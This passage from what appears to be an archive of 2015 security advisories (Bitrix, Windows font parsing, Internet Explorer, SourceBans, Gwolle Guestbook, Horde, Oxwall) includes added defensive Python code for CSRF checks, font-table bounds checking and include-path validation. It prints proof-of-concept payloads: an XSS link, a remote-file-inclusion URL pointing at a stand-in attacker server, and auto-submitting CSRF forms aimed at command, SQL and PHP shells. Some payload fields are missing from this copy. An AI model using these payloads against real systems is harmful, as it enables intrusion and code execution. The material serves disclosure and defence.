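from urllib.parse import urlsplit

_UNSAFE_METHODS = {"POST", "PUT", "PATCH", "DELETE"}


def issue_csrf_token(session: Dict[str, str]) -> str:
    """Create the per-session secret once; the server embeds it in its own forms."""
    if "csrf_token" not in session:
        session["csrf_token"] = secrets.token_urlsafe(32)
    return session["csrf_token"]


def _request_source(headers: Dict[str, str]) -> Optional[str]:
    """Hostname from Origin (preferred) or Referer; None if neither is usable."""
    origin = headers.get("Origin", "")
    if origin and origin.lower() != "null":
        return urlsplit(origin).hostname
    referer = headers.get("Referer", "")
    if referer:
        return urlsplit(referer).hostname
    return None


def reject_reason(request: Dict, session: Dict[str, str], site_host: str) -> Optional[str]:
    """None when the request may proceed, otherwise a short reason for a 403.

    Two independent layers: the browser-set Origin/Referer must name this site
    (a page on another origin cannot forge that header), and the form must
    carry the token that only a page served by this site could have read.
    """
    if request["method"].upper() not in _UNSAFE_METHODS:
        return None  # safe methods must not change state, so nothing to protect
    source = _request_source(request.get("headers", {}))
    if source is None:
        return "no Origin or Referer header on a state-changing request"
    if source.lower() != site_host.lower():
        return f"cross-origin request from {source}"
    expected = session.get("csrf_token", "")
    supplied = request.get("form", {}).get("csrf_token", "")
    # constant-time comparison so token bytes cannot be guessed one at a time
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return "missing or mismatched CSRF token"
    return None


def demo() -> Dict[str, Optional[str]]:
    """Constructed requests against a constructed site host and session."""
    site = "bitrix.example"
    session: Dict[str, str] = {}
    token = issue_csrf_token(session)
    requests = {
        "legit_post": {"method": "POST",
                       "headers": {"Origin": "https://bitrix.example"},
                       "form": {"module_id": "blog", "csrf_token": token}},
        "forged_cross_site": {"method": "POST",
                              "headers": {"Origin": "https://attacker.example"},
                              "form": {"module_id": "blog"}},
        "same_origin_no_token": {"method": "POST",
                                 "headers": {"Referer": "https://bitrix.example/admin/"},
                                 "form": {"module_id": "blog"}},
        "plain_get": {"method": "GET", "headers": {}, "form": {}},
    }
    return {name: reject_reason(req, session, site) for name, req in requests.items()}


if __name__ == "__main__":
    for name, reason in demo().items():
        print(f"{name:>22}: {reason or 'allowed'}")
```

Refusing requests that carry neither Origin nor Referer is a strict policy 
(some privacy settings strip both); a deployment that cannot afford it keeps 
the token comparison as the mandatory layer and logs the header-less case 
instead of rejecting it.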
 
The vulnerability exists due to insufficient filtering of the "work[]" HTTP 
POST parameter in the "/bitrix/admin/bitrix.mpbuilder_step2.php" script before 
it is used in the include() PHP function. A remote attacker can include and 
execute an arbitrary local file on the target system.

The simple exploit below includes and executes the "/tmp/file" file:

<form action="http://[host]/bitrix/admin/bitrix.mpbuilder_step2.php?module_id=blog" method="post" name="main">

In a real-world scenario an attacker can use session files to execute arbitrary 
PHP code. For example, an attacker can change the name in his profile to  and 
create a CSRF exploit that passes arbitrary commands and executes them on the 
system. The PoC code below executes the /bin/ls command using a previously 
created session file with the malicious "NAME" value:


<form action="http://[host]/bitrix/admin/bitrix.mpbuilder_step2.php?module_id=blog" method="post" name="main">

---

Solution:

Update to bitrix.mpbuilder module 1.0.12

---

References:

[1] High-Tech Bridge Advisory HTB23281 - 
https://www.htbridge.com/advisory/HTB23281 - PHP File Inclusion in 
bitrix.mpbuilder Bitrix module
[2] bitrix.mpbuilder - 
https://marketplace.1c-bitrix.ru/solutions/bitrix.mpbuilder/ - Bitrix module 
for software developers. 
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



Secunia Research: Microsoft Windows usp10.dll "GetFontDesc()" Integer Underflow Vulnerability

2015-12-10 Thread Secunia Research
== 
 
Secunia Research 08/12/2015  

 Microsoft Windows usp10.dll "GetFontDesc()"
  Integer Underflow Vulnerability

== 
Table of Contents

Affected Software........................................1
Severity.................................................2
Description of Vulnerability.............................3
Solution.................................................4
Time Table...............................................5
Credits..................................................6
References...............................................7
About Secunia............................................8
Verification.............................................9

== 
1) Affected Software


* Microsoft Windows 7
* Microsoft Windows Server 2008

== 
2) Severity 

Rating: Highly critical
Impact: System Access
Where:  From remote
 
== 
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in Microsoft Windows,
which can be exploited by malicious people to compromise a user's
system.

The vulnerability is caused by an integer underflow error within the 
"GetFontDesc()" function in usp10.dll when processing a font file's cmap table, 
and can be exploited to cause a heap-based buffer overflow via a font file 
whose cmap table data contains a specially crafted offset within the encoding 
records.

Successful exploitation allows execution of arbitrary code.
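
The advisory gives no code, but it names the pattern: an offset read from a 
cmap encoding record feeds a length computation that underflows, and the copy 
that follows overruns a heap buffer. The Python example below is added here; it 
is not Secunia's or Microsoft's code and does not model usp10.dll's internals. 
It parses the public cmap layout from the OpenType specification with every 
comparison done before any subtraction, and builds four constructed tables: one 
well-formed and three with crafted encoding records.

```python
"""Bounds-checked parser for the OpenType 'cmap' header and encoding records.

Added example, not Secunia's or Microsoft's code. Only the public cmap layout
(OpenType spec) is used; the sample tables are constructed for the demo.
"""
import struct
from typing import Dict, List, Optional

_HEADER = struct.Struct(">HH")      # version, numTables
_RECORD = struct.Struct(">HHI")     # platformID, encodingID, subtableOffset
_MIN_SUBTABLE = 8                   # enough bytes for every format's length field


class CmapError(ValueError):
    """Any structural inconsistency; the caller rejects the whole font."""


def _subtable_length(table: bytes, off: int, fmt: int) -> int:
    """Where the length field sits depends on the subtable format."""
    if fmt in (0, 2, 4, 6):
        return struct.unpack_from(">H", table, off + 2)[0]
    if fmt in (8, 10, 12, 13):
        return struct.unpack_from(">I", table, off + 4)[0]
    if fmt == 14:
        return struct.unpack_from(">I", table, off + 2)[0]
    raise CmapError(f"unknown subtable format {fmt}")


def parse_cmap(table: bytes) -> List[Dict[str, int]]:
    """Return one dict per encoding record, or raise CmapError."""
    n = len(table)
    if n < _HEADER.size:
        raise CmapError("table shorter than the cmap header")
    _version, num_tables = _HEADER.unpack_from(table, 0)
    records_end = _HEADER.size + num_tables * _RECORD.size
    if records_end > n:
        raise CmapError(f"{num_tables} encoding records do not fit in {n} bytes")
    records = []
    for i in range(num_tables):
        pid, eid, off = _RECORD.unpack_from(table, _HEADER.size + i * _RECORD.size)
        # Compare first, subtract later: in C, (n - off) on unsigned operands
        # wraps when off > n, and an offset inside the header or record array
        # makes the subtable overlap structures that were already parsed.
        if off < records_end or off > n - _MIN_SUBTABLE:
            raise CmapError(f"record {i}: offset {off:#x} outside the table body")
        fmt = struct.unpack_from(">H", table, off)[0]
        length = _subtable_length(table, off, fmt)
        remaining = n - off                      # safe: off <= n - 8 was checked
        if length < _MIN_SUBTABLE or length > remaining:
            raise CmapError(f"record {i}: subtable length {length} > remaining {remaining}")
        records.append({"platform": pid, "encoding": eid, "offset": off,
                        "format": fmt, "length": length})
    return records


def validate(table: bytes) -> Optional[str]:
    """None when the table is structurally sound, otherwise the rejection reason."""
    try:
        parse_cmap(table)
    except (CmapError, struct.error) as exc:
        return str(exc)
    return None


def build_samples() -> Dict[str, bytes]:
    """Constructed cmap tables: one valid, three with crafted encoding records."""
    def table(offset: int, length: int = 262) -> bytes:
        header = _HEADER.pack(0, 1) + _RECORD.pack(1, 0, offset)
        subtable = struct.pack(">HHH", 0, length, 0) + bytes(256)   # format 0
        return header + subtable
    return {
        "valid": table(offset=12),                    # record array ends at 12
        "offset_inside_header": table(offset=4),      # points back into the header
        "offset_past_end": table(offset=0xFFFFFFF0),  # would wrap (n - off) in C
        "length_past_end": table(offset=12, length=0xFFFF),
    }


if __name__ == "__main__":
    for name, data in build_samples().items():
        print(f"{name:>22}: {validate(data) or 'ok'}")
```

The order of the two offset comparisons is the whole point: rejecting `off > n - 8` 
before computing `n - off` is what a parser must do so that the remaining-bytes 
value can never go negative (or, in unsigned C arithmetic, wrap to a huge number) 
and be handed to a copy routine.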

== 
4) Solution 

Apply update provided by MS15-130.

== 
5) Time Table

09/10/2015 - Vendor notified.
12/10/2015 - Vendor response.
17/10/2015 - Status update provided by the vendor.
28/10/2015 - Vendor provides December 2015 as intended fix date.
08/12/2015 - Release of vendor patch and public disclosure.

== 
6) Credits 

Discovered by Hossein Lotfi, Secunia Research (now part of
Flexera Software).

== 
7) References


The Common Vulnerabilities and Exposures (CVE) project has assigned
the CVE-2015-6130 identifier for the vulnerability.
 
== 
8) About Secunia (now part of Flexera Software)

In September 2015, Secunia was acquired by Flexera Software:

https://secunia.com/blog/435/

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/products/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/company/jobs/

== 
9) Verification 

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2015-6/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

==


BFS-SA-2015-003: Internet Explorer CObjectElement Use-After-Free Vulnerability

2015-12-10 Thread Blue Frost Security Research Lab
Blue Frost Security GmbH
https://www.bluefrostsecurity.de/   research(at)bluefrostsecurity.de
BFS-SA-2015-003 10-December-2015


Vendor: Microsoft, http://www.microsoft.com
Affected Products:  Internet Explorer
Affected Version:   IE 11
Vulnerability:  MSHTML!CObjectElement Use-After-Free Vulnerability
CVE ID: CVE-2015-6152


I.   Impact

This vulnerability allows the execution of arbitrary code on vulnerable
installations of Microsoft Internet Explorer. User interaction is required to
exploit this vulnerability in that the target must visit a malicious page or
open a malicious file.



II.  Vulnerability Details

Microsoft Internet Explorer 11 is prone to a use-after-free vulnerability in
the MSHTML!CTreeNode::ComputeFormatsHelper function. The analysis was performed
on Internet Explorer 11 running on Windows 7 SP1 (x64).

The following HTML page can be used to reproduce the issue:





small{ -ms-block-progression: lr; -ms-filter: "vv"; }


function trigger() { document.execCommand("JustifyLeft"); }

bluefrost
security
trigger();


With page heap enabled and the Memory Protect feature turned off, visiting
that page results in the following crash:

(2d4.830): Access violation - code c0000005 (!!! second chance !!!)
eax=09b09e90 ebx=125b4e60 ecx=00000000 edx=6e9fedf0 esi=0f552fa0 edi=0f552fa0
eip=6dfcc19b esp=097fb520 ebp=097fc1f0 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
MSHTML!CTreeNode::ComputeFormatsHelper+0x53:
6dfcc19b f740240300      test    dword ptr [eax+24h],3h   ds:002b:09b09eb4=

0:007> !heap -p -a @eax
address 09b09e90 found in
_DPH_HEAP_ROOT @ 9b01000
in free-ed allocation (  DPH_HEAP_BLOCK: VirtAddr VirtSize)
9b01f04:  9b09000 2000
748090b2 verifier!AVrfDebugPageHeapFree+0x00c2
77e61b1c ntdll!RtlDebugFreeHeap+0x002f
77e1ae8a ntdll!RtlpFreeHeap+0x005d
77dc2b65 ntdll!RtlFreeHeap+0x0142
758814ad kernel32!HeapFree+0x0014
6d92d219 MSHTML!MemoryProtection::CMemoryProtector::ProtectedFree+0x0122
6dc46583 MSHTML!CObjectElement::`vector deleting destructor'+0x0023
6dfce0db MSHTML!CElement::PrivateRelease+0x027e
6d98953d MSHTML!CObjectElement::DeferredFallback+0x033d
6d96e1b3 MSHTML!GlobalWndOnMethodCall+0x017b
6d95577e MSHTML!GlobalWndProc+0x012e
770762fa user32!InternalCallWinProc+0x0023
77076d3a user32!UserCallWinProcCheckWow+0x0109
770777c4 user32!DispatchMessageWorker+0x03bc
7707788a user32!DispatchMessageW+0x000f
6ebfa7b8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x0464
6ec38de8 IEFRAME!LCIETab_ThreadProc+0x03e7
76a9e81c iertutil!CMemBlockRegistrar::_LoadProcs+0x0067
747b4b01 IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x0094
7588336a kernel32!BaseThreadInitThunk+0x000e
77dc9882 ntdll!__RtlUserThreadStart+0x0070
77dc9855 ntdll!_RtlUserThreadStart+0x001b

We can see that a freed CObjectElement object is accessed in the
MSHTML!CTreeNode::ComputeFormatsHelper function. If we take a look at the
memory just before the CObjectElement destructor is called, we can see where
the object was initially allocated.

0:007> bu MSHTML!CObjectElement::~CObjectElement
0:007> g
Breakpoint 0 hit
eax=6daf6b10 ebx=00000000 ecx=0980de90 edx=0f834bb0 esi=0980de90 edi=094bc324
eip=6dc4658f esp=094bc310 ebp=094bc318 iopl=0         nv up ei ng nz na pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000287
MSHTML!CObjectElement::~CObjectElement:
0:007> !heap -p -a poi(@esp+4)
address 09b09e90 found in
_DPH_HEAP_ROOT @ 9b01000
in busy allocation (  DPH_HEAP_BLOCK: UserAddr UserSize -   
  VirtAddr VirtSize)
 9b01f04:  9b09e90  170 -   
   9b09000 2000
  MSHTML!CObjectElement::`vftable'
74808e89 verifier!AVrfDebugPageHeapAllocate+0x0229
77e6134e ntdll!RtlDebugAllocateHeap+0x0030
77e1b16e ntdll!RtlpAllocateHeap+0x00c4
77dc2fe3 ntdll!RtlAllocateHeap+0x023a
6daf6a27 MSHTML!CObjectElement::CreateElement+0x0017
6e0423a4 MSHTML!CHtmParse::ParseBeginTag+0x00b8
6df17172 MSHTML!CHtmParse::ParseToken+0x0096
6df16a0f MSHTML!CHtmPost::ProcessTokens+0x04c7
6dd8341b MSHTML!CHtmPost::Exec+0x0207
6da308a8 MSHTML!CHtmPost::Run+0x003d
6da3080e MSHTML!PostManExecute+0x0061
6da2727c

Reflected Cross-Site Scripting (XSS) in SourceBans

2015-12-02 Thread High-Tech Bridge Security Research
Advisory ID: HTB23273
Product: SourceBans
Vendor: Sourcebans team
Vulnerable Version(s): 1.4.11 and probably prior
Tested Version: 1.4.11
Advisory Publication:  October 2, 2015  [without technical details]
Vendor Notification: October 2, 2015 
Public Disclosure: October 22, 2015 
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2015-8349
Risk Level: Medium 
CVSSv3 Base Score: 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered a vulnerability in SourceBans, 
which can be exploited to perform Cross-Site Scripting (XSS) attacks against 
users of the web application. 

The vulnerability exists due to insufficient filtering of input data passed 
via the "advSearch" HTTP GET parameter to the "/index.php" script when the "p" 
parameter is set to 'banlist'. A remote unauthenticated attacker can trick a 
user into opening a specially crafted link and execute arbitrary HTML and 
script code in the user's browser in the context of the vulnerable website. 

This vulnerability can be used in an advanced attack to compromise the web 
application and gain control over services within the local network. 

The simple exploit below displays a JavaScript popup containing the word 
"ImmuniWeb":

http://[host]/index.php?p=banlist=0%27%22%3E%3Cimg+src=x+onerror=alert%28/ImmuniWeb/%29%3E=btype



---

Solution:

Update to SourceBans 2.0 pre-alpha. This version is not vulnerable.

---

References:

[1] High-Tech Bridge Advisory HTB23273 - 
https://www.htbridge.com/advisory/HTB23273 - Reflected Cross-Site Scripting 
(XSS) in SourceBans.
[2] SourceBans - http://www.sourcebans.net/ - When running SourceBans web 
interface and the SourceMod plugin together, you will be able to instantly ban 
people from all of the servers you have added into the system. 
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



Remote File Inclusion in Gwolle Guestbook WordPress Plugin

2015-12-02 Thread High-Tech Bridge Security Research
Advisory ID: HTB23275
Product: Gwolle Guestbook WordPress Plugin
Vendor: Marcel Pol
Vulnerable Version(s): 1.5.3 and probably prior
Tested Version: 1.5.3
Advisory Publication:  October 14, 2015  [without technical details]
Vendor Notification: October 14, 2015 
Vendor Patch: October 16, 2015 
Public Disclosure: November 4, 2015 
Vulnerability Type: PHP File Inclusion [CWE-98]
CVE Reference: CVE-2015-8351
Risk Level: Critical 
CVSSv3 Base Score: 9.0 [CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered a critical Remote File 
Inclusion (RFI) vulnerability in the Gwolle Guestbook WordPress plugin, which 
can be exploited by a non-authenticated attacker to include a remote PHP file 
and execute arbitrary code on the vulnerable system.  

The "abspath" HTTP GET parameter is not properly sanitized before being used in 
the PHP require() function. A remote attacker can include a file named 
'wp-load.php' from an arbitrary remote server and execute its content on the 
vulnerable web server. To do so, the attacker places a malicious 'wp-load.php' 
file in the document root of his own server and passes that server's URL in 
the request:

http://[host]/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://[hackers_website]

Exploiting this vulnerability remotely requires 'allow_url_include' to be set 
to 1. Otherwise, the attacker may still include local files and execute 
arbitrary code that way. 

Successful exploitation of this vulnerability will lead to entire WordPress 
installation compromise, and may even lead to the entire web server compromise. 
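The flawed pattern described above beside a resolver that refuses both remote and out-of-root targets, as an added example written for this page (it is not the plugin's code, and the 1.5.4 fix is not claimed to look like this). The WordPress root "/var/www/html" and the function names are assumptions; the real fix for a plugin is to not accept this path from the client at all, since the plugin already knows where WordPress lives.

```python
import posixpath
import re

# Constructed for this example (not the plugin's code): the WordPress root
# from which the plugin legitimately needs wp-load.php.
WP_ROOT = "/var/www/html"

# A URL scheme or PHP stream wrapper prefix: http:, https:, ftp:, php:, data:, ...
_SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.\-]*:")


def vulnerable_include_target(abspath: str) -> str:
    """The flawed pattern: the client-supplied abspath is joined with
    'wp-load.php' and handed to require() unchecked, so an attacker's URL
    becomes a remote include (with allow_url_include on) and a local path
    becomes a local file inclusion (without it)."""
    return abspath + "/wp-load.php"


def hardened_include_target(abspath: str, root: str = WP_ROOT) -> str:
    """Resolve abspath + '/wp-load.php' only if the result stays inside root.

    Rejects URL schemes and stream wrappers, NUL bytes, protocol-relative
    paths and '..' traversal that leaves the root. Raises ValueError.
    """
    if "\x00" in abspath or abspath.startswith("//") or _SCHEME_RE.match(abspath):
        raise ValueError("URL or stream wrapper rejected: %r" % abspath)
    root = posixpath.normpath(root)
    # posixpath.join discards root when abspath is absolute; normpath then
    # collapses any '..' so the containment check below sees the real target.
    candidate = posixpath.normpath(posixpath.join(root, abspath, "wp-load.php"))
    if not candidate.startswith(root + "/"):
        raise ValueError("path escapes the WordPress root: %r" % candidate)
    return candidate


def is_rejected(abspath: str) -> bool:
    """True if the hardened resolver refuses this abspath value."""
    try:
        hardened_include_target(abspath)
    except ValueError:
        return True
    return False
```

The scheme check is what blocks the advisory's http://[hackers_website] payload regardless of allow_url_include; the containment check is what closes the local-file variant that remains when that setting is off.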


---

Solution:

Update to Gwolle Guestbook 1.5.4

More Information:
https://wordpress.org/plugins/gwolle-gb/changelog/

---

References:

[1] High-Tech Bridge Advisory HTB23275 - 
https://www.htbridge.com/advisory/HTB23275 - PHP File Inclusion in Gwolle 
Guestbook WordPress Plugin.
[2] Gwolle Guestbook WordPress Plugin - 
https://wordpress.org/plugins/gwolle-gb/ - Gwolle Guestbook is the WordPress 
guestbook you've just been looking for.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



RCE and SQL injection via CSRF in Horde Groupware

2015-11-18 Thread High-Tech Bridge Security Research
Advisory ID: HTB23272
Product: Horde Groupware 
Vendor: http://www.horde.org
Vulnerable Version(s): 5.2.10  and probably prior
Tested Version: 5.2.10 
Advisory Publication:  September 30, 2015  [without technical details]
Vendor Notification: September 30, 2015 
Vendor Patch: October 22, 2015 
Public Disclosure: November 18, 2015 
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2015-7984
Risk Level: High 
CVSSv3 Base Score: 8.3 [CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered three Cross-Site Request 
Forgery (CSRF) vulnerabilities in Horde Groupware, a popular collaboration 
suite used by a variety of companies around the world. These vulnerabilities 
are very dangerous, since they can be used in targeted attacks against 
corporate clients. An attacker might be able to gain unauthorized access to 
information stored in the database, execute arbitrary commands on the server, 
compromise the entire application and perform attacks against application 
users and the company's infrastructure. 


1) Cross-Site Request Forgery in Horde Groupware: CVE-2015-7984

1.1 The vulnerability exists due to the failure of the "/admin/cmdshell.php" 
script to properly verify the source of an HTTP request. A remote attacker can 
trick a logged-in administrator into visiting a malicious page with a CSRF 
exploit and execute arbitrary system commands on the server.

The CSRF exploit below sends an HTTP POST request to the vulnerable script and 
instructs it to display the output of the "/bin/ls" command. As a result, the 
contents of the "/admin/" directory are displayed:

<form action="http://[host]/admin/cmdshell.php" method="post" name="main">
<!-- hidden <input> fields carrying the "/bin/ls" command are missing from this copy of the advisory -->
<input type="submit" id="btn">
</form>
<script>
document.getElementById('btn').click();
</script>


1.2 The vulnerability exists due to the failure of the "/admin/sqlshell.php" 
script to properly verify the source of an HTTP request. A remote attacker can 
trick a logged-in administrator into visiting a malicious page with a CSRF 
exploit and execute arbitrary SQL queries against the application's database.

The exploit code below executes the "SELECT version()" query and displays the 
version of the MySQL server: 

<form action="http://[host]/admin/sqlshell.php" method="post" name="main">
<!-- hidden <input> fields carrying the "SELECT version()" query are missing from this copy of the advisory -->
<input type="submit" id="btn">
</form>
<script>
document.getElementById('btn').click();
</script>


1.3 The vulnerability exists due to the failure of the "/admin/phpshell.php" 
script to properly verify the source of an HTTP request. A remote attacker can 
trick a logged-in administrator into visiting a malicious page with a CSRF 
exploit and execute arbitrary PHP code on the server.

The exploit code below executes the "phpinfo()" function and displays its 
output:

<form action="http://[host]/admin/phpshell.php" method="post" name="main">
<!-- hidden <input> fields carrying the phpinfo() payload are missing from this copy of the advisory -->
<input type="submit" id="btn">
</form>
<script>
document.getElementById('btn').click();
</script>


---

Solution:

Update to Horde Groupware 5.2.11

More Information:
http://lists.horde.org/archives/announce/2015/001137.html

---

References:

[1] High-Tech Bridge Advisory HTB23272 - 
https://www.htbridge.com/advisory/HTB23272 - Multiple CSRF Vulnerabilities in 
Horde Groupware.
[2] Horde Groupware - http://www.horde.org - Horde Groupware is a free, 
enterprise ready, browser based collaboration suite.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - 
international in scope and free for public use, CVE® is a dictionary of 
publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to 
developers and security practitioners, CWE is a formal list of software 
weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual 
web application penetration test and cutting-edge vulnerability scanner 
available online via a Software-as-a-Service (SaaS) model.

---

Disclaimer: The information provided in this Advisory is provided "as is" and 
without any warranty of any kind. Details of this Advisory may be updated in 
order to provide as accurate information as possible. The latest version of the 
Advisory is available on web page [1] in the References.



Secunia Research: Google Picasa CAMF Section Integer Overflow Vulnerability

2015-11-11 Thread Secunia Research
==
 
  Secunia Research (now part of Flexera Software) 11/11/2015

   Google Picasa CAMF Section Integer Overflow Vulnerability

==
Table of Contents

Affected Software..................1
Severity...........................2
Description of Vulnerability.......3
Solution...........................4
Time Table.........................5
Credits............................6
References.........................7
About Secunia......................8
Verification.......................9

==

1) Affected Software

* Google Picasa version 3.9.140 Build 239
* Google Picasa version 3.9.140 Build 248

NOTE: Prior versions may also be affected.

==

2) Severity 

Rating: Highly critical
Impact: System Access
Where:  From remote
 
==

3) Description of Vulnerability

Secunia Research has discovered a vulnerability in Google Picasa,
which can be exploited by malicious people to compromise a user's
system.

The vulnerability is caused by an integer overflow error when processing
the CAMF section in FOVb images and can be exploited to cause a heap-based
buffer overflow.

Successful exploitation may allow execution of arbitrary code.

The vulnerability is confirmed in versions 3.9.140 Build 239 and
3.9.140 Build 248 running on Windows.

==

4) Solution 

Update to version 3.9.140 Build 259.

==

5) Time Table 

04/08/2015 - Vendor notified of vulnerability.
04/08/2015 - Vendor acknowledges report.
10/08/2015 - Vendor requests PoC.
10/08/2015 - Provision of PoC.
19/08/2015 - Vendor acknowledges receipt.
08/09/2015 - Request of status update.
11/09/2015 - Vendor states fixed in code. ETA not yet available.
19/09/2015 - Vendor states update has been pushed.
25/09/2015 - Vendor notified of incomplete fix of other
 vulnerability and request status update for this
 vulnerability.
26/09/2015 - Vendor acknowledges receipt.
05/10/2015 - Request ETA of fix of other vulnerability. Vendor
 notified that due to public availability of improper fix
 of other vulnerability, an advisory release deadline on
 09/10/2015 is established for the other vulnerability.
06/10/2015 - Vendor acknowledges and estimates 30/10/2015 release of
 fix.
06/10/2015 - Vendor notified that advisory deadline will still
 be applicable.
06/10/2015 - Vendor acknowledges and states to send notification once
 properly fixed.
09/10/2015 - Public disclosure of advisory with SAID SA59000.
12/10/2015 - Public disclosure of research advisory 2015-3.
29/10/2015 - Vendor states fixed status and fix had been verified.
30/10/2015 - Request version number of fix as change log updates and
 release notes updates are missing.
05/11/2015 - Vendor states fixed version.
11/11/2015 - Release of update of advisory with SAID SA59000 after
 verification of patched version.
11/11/2015 - Public disclosure of research advisory 2015-5.

==

6) Credits 

Discovered by Hossein Lotfi, Secunia Research (now part of
Flexera Software).

==

7) References

Currently no CVE identifier is assigned.
 
==

8) About Secunia (now part of Flexera Software)

In September 2015, Secunia was acquired by Flexera Software:

https://secunia.com/blog/435/

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below
to see currently

Cross-Site Request Forgery on Oxwall

2015-10-29 Thread High-Tech Bridge Security Research
Advisory ID: HTB23266
Product: Oxwall
Vendor: http://www.oxwall.org
Vulnerable Version(s): 1.7.4 and probably prior
Tested Version: 1.7.4
Advisory Publication:  July 1, 2015  [without technical details]
Vendor Notification: July 1, 2015 
Vendor Patch: September 8, 2015 
Public Disclosure: October 22, 2015 
Vulnerability Type: Cross-Site Request Forgery [CWE-352]
CVE Reference: CVE-2015-5534
Risk Level: High 
CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L]
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( 
https://www.htbridge.com/advisory/ ) 

---

Advisory Details:

High-Tech Bridge Security Research Lab discovered a vulnerability in Oxwall 
which can be exploited to perform CSRF (Cross-Site Request Forgery) attacks. An 
attacker might be able to put the website into maintenance mode and perform 
XSS attacks against website visitors.

The vulnerability exists due to the failure of the "/admin/pages/maintenance" 
script to properly verify the source of the HTTP request. A remote attacker can 
trick a logged-in administrator into visiting a page with a CSRF exploit and put 
the entire website into maintenance mode. Additionally, the attacker is able to 
inject arbitrary HTML and JavaScript code into the maintenance message and 
execute it in the browsers of all website visitors, since the message is shown 
to every visitor for as long as maintenance mode stays on. Successful 
exploitation of this vulnerability may allow an attacker to steal other users' 
cookies, spread malware to website visitors, and even obtain full control over 
the vulnerable website. 

A simple CSRF exploit below puts the website into maintenance mode and displays 
a JS popup with the word "ImmuniWeb" to every website visitor:

<form action="http://[host]/admin/pages/maintenance" method="POST">
<!-- hidden <input> fields enabling maintenance mode and carrying the message with the script payload are missing from this copy of the advisory -->
<input type="submit" id="btn">
</form>
<script>
document.getElementById('btn').click();
</script>


---

Solution:

Update to Oxwall 1.8

---

References:

[1] High-Tech Bridge Advisory HTB23266 - 
